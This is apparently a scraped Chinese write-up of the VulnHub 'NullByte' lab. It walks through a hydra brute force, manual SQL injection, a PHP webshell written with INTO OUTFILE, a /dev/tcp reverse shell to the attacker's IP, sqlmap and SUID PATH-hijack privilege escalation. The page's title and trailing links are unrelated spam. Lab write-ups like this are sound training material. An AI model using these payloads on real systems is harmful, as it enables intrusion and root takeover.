当前位置: 首页 > news >正文

企业网站的基本形式不包括中国科技大学

企业网站的基本形式不包括,中国科技大学,襄阳建设路21号创意园网站,临沂罗庄做网站公司#x1f36c; 博主介绍#x1f468;‍#x1f393; 博主介绍#xff1a;大家好#xff0c;我是 hacker-routing #xff0c;很高兴认识大家~ ✨主攻领域#xff1a;【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】 #x1f389;点赞➕评论➕收… 博主介绍‍ 博主介绍大家好我是 hacker-routing 很高兴认识大家~ ✨主攻领域【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】 点赞➕评论➕收藏 养成习惯一键三连 欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋 作者水平有限欢迎各位大佬指点相互学习进步 目录 前言 一、信息收集 1、主句探测 2、端口扫描 3、漏洞扫描 二、渗透测试信息收集 1、web渗透 2、目录扫描 3、hydra爆破key值 三、sql注入大赏 1、手工联合注入大赏 2、SQL注入写入一句话木马 3、SQL注入写入反弹shell 4、脚本小子SQLmap一把梭 四、提权 1、ssh登录 2、SUID提权 前言 靶机精讲之Nullbyte。涉及Hydra表单暴力破解John md5哈希暴力破解手工SQL注入数据库信息猜解、SQL注入数据库写入一句话木马、写入反弹shell使用SQLmap自动化注入可谓SQL注入技能大赏。提权用具有suid权限的可执行文件执行我们写入的shell的方式实现。很精彩的一台sql注入为主的靶机值得研究和学习。 一、信息收集 1、主句探测 利用arp探测发现靶机的IP地址是192.168.103.160 ┌──(rootkali)-[~] └─# arp-scan -l2、端口扫描 利用nmap进行端口扫描发现靶机开放了80、111、777、38389端口其中这里的ssh服务的22端口改成了777端口这里需要师傅们注意下。 ┌──(rootkali)-[~] └─# nmap -sS -A -p- 192.168.103.160再利用nmap进行UDP端口的扫描但是没有什么特别值得去挖掘的地方从目前的情况来看80端口是最值得去查看的。 ┌──(rootkali)-[~] └─# nmap -sU --top-port 20 192.168.103.160-sU: 这个选项告诉Nmap执行UDP扫描。--top-port 20: 这个选项告诉Nmap只扫描最常见的20个端口。Nmap会扫描UDP端口1到20这些端口通常是最有可能开放的UDP端口。 3、漏洞扫描 利用nmap进行漏洞扫描挖掘看看有没有什么新的发现。 ┌──(rootkali)-[~] └─# nmap --scriptvuln -p80,111,777,38389 192.168.103.160nmap: 这是Nmap扫描程序的命令。--scriptvuln: 这个选项告诉Nmap使用漏洞扫描脚本以探测目标主机上的已知漏洞。-p80,111,777,38389: 这个选项指定了要扫描的端口号包括80常用的Web服务端口、111RPC端口、777(ssh端口)和38389等。192.168.103.160: 这是目标主机的IP地址。 扫描发现web的80端口下有/phpmyadmin/目录以及扫描发现到这个靶场还可能存在CVE:CVE-2007-6750漏洞这个漏洞大家可以上网查找一下然后复现下。我这里复现过了他这个漏洞的危害就是可以利用MSF模块进行攻击然后使http页面瘫痪访问不了的作用但是这里对我们的渗透测试没有什么特别大的价值。 二、渗透测试信息收集 1、web渗透 访问web的80端口就一张图片右击查看网页源代码就显示了一张图片名字没有任何的提示了。还是没有什么发现我们尝试进行目录扫描看看有什么突破没有。 2、目录扫描 我们利用gobuster 进行扫描目录发现扫描得到了/uploads、/phpmyadmin、/javascript目录我们下面尝试进行访问扫描出来的目录。 ┌──(rootkali)-[~] └─# gobuster dir -u http://192.168.103.160 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txtgobuster: 这是目录和文件爆破工具。dir: 利用gobuster执行目录爆破。-u http://192.168.103.160: 要爆破的目标URL。-w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt: 这个字典在kali中常用于进行目录爆破的师傅们可以记下 访问/uploads/目录提示这个目录下没有任何的文件这就给我们一个提示说不定是叫我们到时候上传上去呢要不然不会无辜给出一个/uploas/目录的这个我们后面多注意下。 访问/phpmyadmin/目录发现需要进行登录一般像这种情况我们可以进行弱口令登录有就有没有就算了因为实战中就是这莫个思路。 想到要账号密码那我们得进行信息收集把像密码的收集起来然后进行登录尝试。 我们开始进行web渗透信息收集的时候开始有张图片我们可以按照CTF的思路进行分析因为这张图片是在web网站的根目录下所以我们可以直接进行下载。 ┌──(rootkali)-[~/桌面] └─# wget http://192.168.103.160/main.gif利用exiftool 工具得到一串特殊的字符串看着很像密码我们把这一串保存下来。 然后放到开始的/phpmyadmin/目录下尝试root/admin的密码登录但是发现都失败了那kzMb5nVYJw到底是什么呢 说不定是目录呢这也有可能啊我们目前也没有什么突破点那就死马当活马医尝试尝试把。 exiftool main.gif 还真的是一个目录太神奇了以前都都很少遇到 我们尝试输入一个值发现报错我们看看网页源代码提示说这个表单没有连接到mysql密码没有那么复杂。 并且我们可以看到这个key是password类型说明这是一个密码我们可以尝试利用hydra进行密码爆破。 3、hydra爆破key值 利用hydra九头蛇进行爆破其中rockyou.txt是kali中常用密码碰撞的字典师傅们可以记录下。 爆破后得到密码是elite ┌──(rootkali)-[~/桌面] └─# hydra 192.168.103.160 http-form-post /kzMb5nVYJw/index.php:key^PASS^:invalid key -l routing -P /usr/share/wordlists/rockyou.txthydra: 这是执行暴力破解攻击的工具。192.168.103.160: 这是目标主机的IP地址。http-form-post: 这个选项告诉Hydra使用HTTP POST方法来提交表单。/kzMb5nVYJw/index.php:key^PASS^:invalid key: 这是指定了要攻击的目标URL和表单字段。在这个URL中kzMb5nVYJw/index.php 是表单提交的路径key^PASS^ 是表单字段^PASS^ 是Hydra将会尝试猜测的密码的占位符而 invalid key 是当密码错误时网站返回的响应。-l routing: 这个选项指定了要猜测的用户名routing 在这里是一个示例用户名。-P /usr/share/wordlists/rockyou.txt: 这个选项指定了用于猜测密码的字典文件路径。在这里使用了一个常见的密码字典文件 /usr/share/wordlists/rockyou.txt。 输入key后得到下面的界面 三、sql注入大赏 1、手工联合注入大赏 我们右击查看源代码发现了420search.php 文件这个文件应该是与这个界面交互的一个文件。 我们随便输入一个123提示我们成功查询到数据并且我们发现这里存在GET传参 我们把123删掉发现了两个用户以及别的信息这很有可能存在sql注入漏洞我们下一步就是可以进行sql注入漏洞尝试。 当我们输入双引号发现这个页面报错了说明我们的猜想是正确的就是存在sql注入 1、order by查看这个数据库的列数我们发现3列正常回显而4列的时候报错了说明这个数据库就是3列。 order by 1,2,3-- -2、union select查看数据库发现数据库的名是seth union select 1,2,database()-- -3、查看表发现表名叫users union select 1,2,group_concat(table_name) from information_schema.tables where table_schemadatabase()-- -4、查看列名得到列id,user,pass,position union select 1,2,group_concat(column_name) from information_schema.columns where table_nameusers-- -5、查看user,pass内容为了看清楚我这里把user和pass分别查看因为pass是一个字符串比较长。 union select 1,2,group_concat(user) from users-- - union select 1,2,group_concat(pass) from users-- -进行base64解码然后得到一个看上去很像MD5的字符串。 ┌──(rootkali)-[~/桌面] └─# echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE |base64 -d 2 ⚙ c6d6bd7ebf806f43c76acc3681703b81利用hash-identifier工具进行判断说明就是MD5加密的 ┌──(root??kali)-[~/桌面] └─# hash-identifier c6d6bd7ebf806f43c76acc3681703b81 进行MD5解密得到密码mega MD5免费在线解密破解_MD5在线加密-SOMD5 我们下面就可以进行ssh登录了 ┌──(rootkali)-[~/桌面] └─# ssh ramses192.168.103.160 -p 777 3 ⚙ The authenticity of host [192.168.103.160]:777 ([192.168.103.160]:777) cant be established. ECDSA key fingerprint is SHA256:H/Y/TKggtnCfMGz457Jy6F6tUZPrvEDD62dP9A3ZIkU. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added [192.168.103.160]:777 (ECDSA) to the list of known hosts. ramses192.168.103.160s password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Aug 2 01:38:58 2015 from 192.168.1.109 ramsesNullByte:~$ id uid1002(ramses) gid1002(ramses) groups1002(ramses) ramsesNullByte:~$ whoami ramses ramsesNullByte:~$ uname -a Linux NullByte 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt11-1deb8u2 (2015-07-17) i686 GNU/Linux2、SQL注入写入一句话木马 采用另外一种方法进行注入获取登录凭据。我们尝试通过注入写入一句话php木马一句话木马如下 ?php system($_GET[cmd]);?实际上注入时能写入文件的前提有两点1.数据库secure_file_priv参数为空即我们具有写的权限。2.需要知道写入文件位置的绝对路径。之前进行目录爆破的时候我们看到了目录uploads这个目录很可能可以写入。这里我们利用into outfile写入php木马文件到/var/www/html/uploads/目录下然后利用GET传参执行命令。 union select ?php system($_GET[a]); ?, 2, 3 into outfile /var/www/html/uploads/shell.php -- -我们发现命令执行成功了 尝试读取一些敏感文件存在注入的页面的源代码提示我们这个界面与420search.php这个后端文件有交互那我们就尝试读取420search.php即可 ?cmdcat%20/var/www/html/kzMb5nVYJw/420search.php得到数据库的账号为root密码为sunnyvale 那么我们就可以利用这个账号密码进行登录/phpmyadmin/了 跟我们第一种方法一样都拿到了用户以及密码的加密字符串解密的方式都一样我这里就不再给师傅们演示了。 3、SQL注入写入反弹shell 我们这个靶机的那个存在sql注入界面的地方我们第二种方法是以写入php木马执行文件然后进行执行命令那么我们可以执行命令我们不就可以直接写入反弹shell的木马然后直接迁移shell了。下面的是监听的IP也就是你自己的kali机器的IP地址 ?php exec(/bin/bash -c bash -i /dev/tcp/192.168.103.129/1234 01); ?我们同样可以通过注入的方式直接把这行代码写入/uploads/目录命名为 nc.php注入语句如下 (特别注意由于php语句是在双引号内因此php语句中出现的双引号需要加\进转义) union select ?php exec(\/bin/bash -c bash -i /dev/tcp/192.168.103.129/1234 01\); ?, 2, 3 into outfile /var/www/html/uploads/nc.php -- - 先在kali上进行监听然后再访问/uploads/nc.php文件就可以成功反弹shell了。 然后切换到/var/www/html/kzMb5nVYJw目录下就可以跟第二种方法一样利用账号密码然后拿到ssh远程账号和密码然后再进行提权操作。 4、脚本小子SQLmap一把梭 利用sqlmap跑脚本就不带师傅们讲太多了只要找到了注入点直接用脚本的命令跑就好了。 ┌──(rootkali)-[/usr/share/wordlists] └─# sqlmap -u http://192.168.103.201/kzMb5nVYJw/420search.php?usrtosearch1 --dump --batch 得到的结果和开始前三种方法都是一样的得到ssh登录的shell --------------------------------------------------------------------- | id | pass | user | position | --------------------------------------------------------------------- | 1 | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | blank | | 2 | --not allowed-- | isis | employee | ---------------------------------------------------------------------密码先base64解密然后再md5解密 得到密码是omega 四、提权 1、ssh登录 ┌──(rootkali)-[~] └─# ssh ramses192.168.103.160 -p 777 密码omega2、SUID提权 我们进行sudo -l查看定时任务都没有发现什么有价值的信息但是我们查看具有suid权限的也就是权限中具有S位说明该文件运行时具有其属主的权限就是root的权限。 确实是具有S权限的也就是root权限的我们可以利用执行这个命令然后提权。 ramsesNullByte:~$ ls -la /var/www/backup/procwatch -rwsr-xr-x 1 root root 4932 Aug 2 2015 /var/www/backup/procwatch 切换到/var/www/backup目录下查看文件详细内容 尝试用运行procwatch看看发生了什么 ramsesNullByte:/var/www/backup$ ./procwatchPID TTY TIME CMD1390 pts/0 00:00:00 procwatch1391 pts/0 00:00:00 sh1392 pts/0 00:00:00 ps发现貌似还执行了两个命令sh可能与shell相关ps可能与进程相关。此时我们的提权思路就是将提权的代码写入procwatch的相关文件中而这个操作与sh和ps相关这样在执行procwatch的时候由于procwatch具有s权限就可以以root身份运行从而触发提权。 首先建立一个软连接将ps连接到/bin/sh这样在执行procwatch的时候无论是sh还是ps都会把root的shshell带出来 ln -s /bin/sh ps 然后我们修改环境变量将当前目录.追加到环境变量的最开始 export PATH.:$PATH 然后我们运行procwatch由于procwatch文件具有s权限会以属主root运行通过前面的操作可知运行procwatch会触发sh。因此就相当于以root启动了shell应该就可以提权了。 ramsesNullByte:/var/www/backup$ ./procwatchPID TTY TIME CMD1390 pts/0 00:00:00 procwatch1391 pts/0 00:00:00 sh1392 pts/0 00:00:00 ps ramsesNullByte:/var/www/backup$ ln -s /bin/sh ps ramsesNullByte:/var/www/backup$ ls -la total 20 drwxrwxrwx 2 root root 4096 Mar 10 18:00 . drwxr-xr-x 4 root root 4096 Aug 2 2015 .. -rwsr-xr-x 1 root root 4932 Aug 2 2015 procwatch lrwxrwxrwx 1 ramses ramses 7 Mar 10 18:00 ps - /bin/sh -rw-r--r-- 1 root root 28 Aug 2 2015 readme.txt ramsesNullByte:/var/www/backup$ export PATH.:$PATH ramsesNullByte:/var/www/backup$ ./procwatch # id uid1002(ramses) gid1002(ramses) euid0(root) groups1002(ramses)成功拿下了这台靶机
http://www.zqtcl.cn/news/241515/

相关文章:

  • 建设企业网站公做深度游网站 知乎
  • 可以做h5的网站韶关网站建设制作
  • 企业网站建设的基本要素有哪些通知模板范文
  • 网站建设计划书范本住房和城乡建设部网站事故快报
  • 西安网站建设公司排家居用品东莞网站建设
  • 网站建设评比文章上海手机网站建设价格
  • 微信手机网站三合一建筑工程网络计划方法
  • 网站上文章分享的代码怎么做的建在线教育网站需要多少钱
  • 如何自己弄网站怎么用手机做网站服务器
  • 如果我的网站被百度收录了_以后如何做更新争取更多收录有做不锈钢工程的网站
  • 适合做公司网站的cms东莞阳光网站投诉平台
  • 建设一个网站的意义印刷东莞网站建设技术支持
  • 80端口被封怎么做网站个人网站做支付接口
  • 如何区分网站开发语言建设网站地图素材
  • 建网站的流程怎么投稿各大媒体网站
  • 品牌推广的步骤和技巧专业seo培训学校
  • 新网站上线怎么做seo网站建设语言什么语言
  • 山东省住房城乡和建设厅网站黄页网站推广下载免费
  • 网站建设与运营的论文的范本百度秒收录蜘蛛池
  • asp.net做音乐网站wordpress伪静态规则iis
  • seo 网站优化2021给个最新网站
  • 做废铝的关注哪个网站好seo推广优化的方法
  • 广州活动网站设计电影网站建设策划书
  • 4a景区网站建设标准网站建设排名优化公司
  • 闲置服务器做网站简单做图网站
  • 网站建设制作软件叫啥网盟推广是什么
  • 常州市住房建设局网站大连设计网站的公司
  • 通用wap网站生成系统wordpress 安装旧版本
  • 做网站用的产品展示横幅手机app开发技术
  • 学校网站模板 中文版沈阳seo博客